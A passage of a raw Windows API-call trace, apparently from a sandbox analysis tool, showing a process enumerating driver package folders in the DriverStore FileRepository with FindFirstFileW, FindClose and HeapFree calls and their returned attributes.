1 [0060.533] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72ce68 | out: hHeap=0x6e0000) returned 1 [0060.534] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\brmfcmf.inf_amd64_neutral_67b5984f8e8ff717\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3af09ebd, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5ffc0901, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5ffc0901, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.536] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.537] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.538] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\brmfcsto.inf_amd64_neutral_2d7208355536945e\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40742ec0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x612333a3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x612333a3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.538] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.538] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.538] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\brmfcumd.inf_amd64_neutral_db43b26810939b3e\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x407db441, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61259503, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61259503, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.539] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.539] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.539] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\brmfcwia.inf_amd64_neutral_817b8835aed3d6b7\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b145361, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60058e82, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60058e82, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.542] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.543] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.543] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\brmfport.inf_amd64_neutral_f41f35e5c21bc350\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b2e8284, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6013d6c3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6013d6c3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.545] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.546] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.546] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\bth.inf_amd64_neutral_e54666f6a3e5af91\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x38143693, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3ba3e59c, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3ba3e59c, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.549] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.550] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.550] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\bthmtpenum.inf_amd64_neutral_c70e85b87ee4ece9\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5bd8c4a7, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6d374f27, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6d374f27, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.550] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.551] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.551] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\bthpan.inf_amd64_neutral_024281c0e4e954e2\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d29879f, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x606e4b0e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x606e4b0e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.551] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.551] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.551] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\bthprint.inf_amd64_neutral_3c11362fa327f5a4\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d92442b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x607c934f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x607c934f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.552] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.553] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.553] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\bthspp.inf_amd64_neutral_1b15060bdfbd09e1\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d7f3928, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x607a31ef, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x607a31ef, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.554] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.554] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.554] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\cdrom.inf_amd64_neutral_0b3d0d1942ab684b\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39a67f22, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3c1164e9, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3c1164e9, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.554] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.554] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.555] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\circlass.inf_amd64_neutral_cf52485bed804e02\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d546063, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60756f2f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60756f2f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.555] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.555] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.555] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\compositebus.inf_amd64_neutral_b9280780a8000d4b\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3766721f, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3b686335, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3b686335, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.556] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.556] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.556] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\cpu.inf_amd64_neutral_ae5de2e1bf2793c3\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42df1487, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61f4acbb, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61f4acbb, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.557] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.558] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.563] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\crcdisk.inf_amd64_neutral_d10626d1f8b423c3\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3dd4eab2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60815610, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60815610, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.563] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.564] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.564] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\cxfalcon_ibv64.inf_amd64_neutral_d065aec3fcf4ec4e\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45ee3941, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65b195e9, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65b195e9, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.566] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.567] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.567] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\cxfalpal_ibv64.inf_amd64_neutral_4c42ac5f00413365\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45fc8183, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65b3f749, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65b3f749, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.570] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.571] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.571] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\cxraptor_fm1216mk5_ibv64.inf_amd64_neutral_3eaae75b591bd148\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4616b0a6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65b8ba0a, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65b8ba0a, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.574] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.575] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.575] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\cxraptor_fm1236mk5_ibv64.inf_amd64_neutral_b81bec917adfaea5\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46229787, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65bd7cca, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65bd7cca, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.577] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.578] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.578] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\cxraptor_philipstuv1236d_ibv64.inf_amd64_neutral_b6a3e57df5bad299\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x460ac9c4, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65b658a9, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65b658a9, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.580] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.581] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.581] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\dc21x4vm.inf_amd64_neutral_8887242a56ee027e\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43ee7166, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6218615f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6218615f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.582] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.582] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.582] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\digitalmediadevice.inf_amd64_neutral_6fd673519d66ab20\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3fea1ef0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60f85ade, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60f85ade, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.583] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.583] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.583] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\disk.inf_amd64_neutral_10ce25bbc5a9cc43\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42c28403, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61f24b5a, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61f24b5a, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.583] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.583] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.583] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\display.inf_amd64_neutral_ea1c8215e52777a6\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a218705, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5f89c6f4, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5f89c6f4, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.584] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.584] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.584] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\divacx64.inf_amd64_neutral_fa0f82f024789743\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x397d4812, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5f63b0ef, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5f63b0ef, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.588] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.589] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.589] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\dot4.inf_amd64_neutral_b89cfac15ccb2fba\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a0c1aa3, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5f82a2d3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5f82a2d3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.591] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.592] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.592] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\dot4prt.inf_amd64_neutral_e7d3f62d0d4411db\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x36ed0bf1, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3b3d8a70, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3b3d8a70, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.593] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.593] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.593] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\eaphost.inf_amd64_neutral_4506dea11740c089\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d20021d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x606e4b0e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x606e4b0e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.593] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.593] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.593] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\ehstorcertdrv.inf_amd64_neutral_2e1cecffae9c899a\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3fa9d9c8, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60f5f97d, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60f5f97d, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.594] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.594] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.594] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\ehstorpwddrv.inf_amd64_neutral_ecd233d7cabbdebf\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3dde7033, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6083b770, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6083b770, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.595] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.595] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.595] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\elxstor.inf_amd64_neutral_4263942b9dfe9077\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x420d9b6f, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61bded14, ftLastAccessTime.dwHighDateTime=0x1ca0444, 